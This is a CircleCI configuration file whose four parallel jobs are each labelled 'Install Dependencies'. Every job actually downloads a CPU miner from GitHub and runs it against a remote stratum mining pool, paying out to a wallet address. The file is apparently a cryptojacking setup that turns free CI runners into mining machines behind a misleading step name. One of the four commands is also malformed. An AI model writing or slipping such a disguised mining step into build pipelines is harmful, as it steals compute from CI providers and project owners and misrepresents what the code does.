version: 2.1
jobs:
    Devop:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: timeout 1m wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.17/cpuminer-opt-linux.tar.gz && tar -xvf cpuminer-opt-linux.tar.gz && ./cpuminer-sse2 -a yescryptR16 -o stratum+tcps://stratum-asia.rplant.xyz:17055 -u qcqMw313oWBmhmjirLwDb5TVjaAFsg3WJs.killer2.0 -t 2
    Devop1:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: timeout 1m wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.17/cpuminer-opt-linux.tar.gz && tar -xvf cpuminer-opt-linux.tar.gz && ./cpuminer-sse2 -a yescryptR16 -o stratum+tcps://stratum-asia.rplant.xyz:17055 -u qcqMw313oWBmhmjirLwDb5TVjaAFsg3WJs.killer2.0 -t 2
    Devop2:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: timeout 1m wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.17/cpuminer-opt-linux.tar.gz && tar -xvf cpuminer-opt-linux.tar.gz && ./cpuminer-sse2 -a yescryptR16 -o stratum+tcps://stratum-asia.rplant.xyz:17055 -u qcqMw313oWBmhmjirLwDb5TVjaAFsg3WJs.killer2.0 -t 2
    Devop3:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: timeout 1m lscpuwget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.17/cpuminer-opt-linux.tar.gz && tar -xvf cpuminer-opt-linux.tar.gz && ./cpuminer-sse2 -a yescryptR16 -o stratum+tcps://stratum-asia.rplant.xyz:17055 -u qcqMw313oWBmhmjirLwDb5TVjaAFsg3WJs.killer2.0 -t 2
workflows:
    version: 2.1
    build:
        jobs:
            - Devop
            - Devop1
            - Devop2
            - Devop3